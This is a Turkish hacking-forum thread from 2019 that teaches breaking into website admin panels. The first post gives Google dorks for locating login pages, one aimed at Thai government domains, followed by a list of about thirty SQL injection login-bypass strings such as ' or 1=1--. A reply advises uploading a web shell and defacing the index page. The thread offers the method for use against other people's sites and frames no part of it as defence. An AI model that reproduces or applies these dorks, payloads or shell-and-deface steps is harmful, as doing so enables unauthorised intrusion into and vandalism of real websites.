Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Web & Server Güvenliği

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.





ByPass ile Site Hackleme |` Raii.

Web & Server Güvenliği

Yeni Konu aç Konu Kapatılmıştır
 
Seçenekler
Alt 19-04-2019 00:08   #1
  • Forumdan Uzaklaştırıldı
  • Üye Bilgileri
Üyelik tarihi
07/2013
Nereden
Mercurius
Mesajlar
Konular

Teşekkür (Etti): 492
Teşekkür (Aldı): 495


ByPass ile Site Hackleme |` Raii.





Merhaba, Bypass ile site hacklemek google'da üreteceğiniz dorka göre değişiklik gösterebilir.
WebHackingde bypass nedir?: Öncelikle bypass tanımını yaparak daha sonrasında işlemlere geçmek daha mantıklı olur. Bypass website içerisinde admin panelinde oluşan bir bug açığıdır.Herhangi bir kullanıcının veya admin yetkili kişinin website içerisinde ki oluşan bir açık ile giriş yapabilmenizi sağlar.



Bypass için gereken dorklarımız şunlardır veya kendiniz de hayal gücünüze göre üretebilirsiniz:

Kod:
inurl:/admin/login.php site:go.th         (site: Kısmındaki komuta hangi ülke uzantısı yazarsanız o siteler ile ilgili erişim sağlamış olursunuz. Örn: site:uk,site:gov.uk,site:edu.uk)
inurl:/administrator/login.php
inurl:/admin/login.asp
inurl:/admin/login.html
Bypass dorkları böyle gider siz dediğim gibi intext: eklerseniz site içerisinde geçen kelimelerle uzlaşan sitelere de ulaşım yaparsınız.
Bypass dorkunu google'da aratalım...



Google gelip dorkumuzu yazıyoruz.



Gireceğimiz siteyi belirleyip admin paneline bypass için kullanacağımız kodları vereceğim ama genellikle " '=' 'or' " kullanılır. Panel kısmında admin kısmı ve password kısmına bu kodu yazıyoruz ve giriş yapıyoruz. (Her siteye girmez şansınıza bağlı olarak denemelisiniz.)



Bypass dorkları:

Kod:
'=' 'or'
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1-- 
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--
intext komutu ile ise googleda şöyle de aratabilirsiniz.
intext komutu nedir?: İntext komutu google içinde aratacağınız site içerisinde bulunan kelimeler ile eşleşen websiteleri size önizler.

Kod:
inurl:/admin/login.php intext:"Mercedes-Benz" site:gr


Bypass ile site hacklemek bu kadar basit. Dork oluşturmak dediğim gibi sizin hayal gücünüze bağlı ve siz ne kadar geliştirirseniz okadar dorkunuza göre sitelere erişebileceğinizi unutmayın. Kendinize iyi bakın görüşmek üzere..

 Offline  
 
Teşekkür

M3TA, Rumexus, GHOSTEMANE, RooTGHoST Teşekkür etti.
Alt 19-04-2019 00:20   #2
  • Bilgi Teknolojileri Ekibi
  • Üye Bilgileri
Üyelik tarihi
01/2016
Mesajlar
Konular

Teşekkür (Etti): 226
Teşekkür (Aldı): 96




Şimdi ben bir site buldumda bunun dilinden anlamıyorum türkçeye çevir deyince de birşey çıkmıyor ben bunu nasıl hacklicem



___________________________________________

Bu memleketin bir kahvesi bir de haini bitmez. o halde hatır kahveye kurşun haine yarasın.
 Offline  
 
Alt 19-04-2019 00:22   #3
  • Forumdan Uzaklaştırıldı
  • Üye Bilgileri
Üyelik tarihi
07/2013
Nereden
Mercurius
Mesajlar
Konular

Teşekkür (Etti): 492
Teşekkür (Aldı): 495




Alıntı:
Rumexus´isimli üyeden Alıntı Mesajı göster
Şimdi ben bir site buldumda bunun dilinden anlamıyorum türkçeye çevir deyince de birşey çıkmıyor ben bunu nasıl hacklicem
Merhaba, Rumexus.
Hedef sitenin arayüzüne girdiğiniz de genel de bypass yapıtğınızda news.php kısmındaki yetkiler olur (genellikle) o kısmı aratıp bulmanızı isterim. Türkçe çeviri kullanıp boş kategoriler varsa oralarıda doldurabilirsiniz. Shell atıp shell yolu ile de index.php kısmına yetkiniz varsa eğer index atabilirsiniz.
 Offline  
 
Konu Kapatılmıştır

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
Siber Güvenlik
sosyal medya bayilik paneli

wau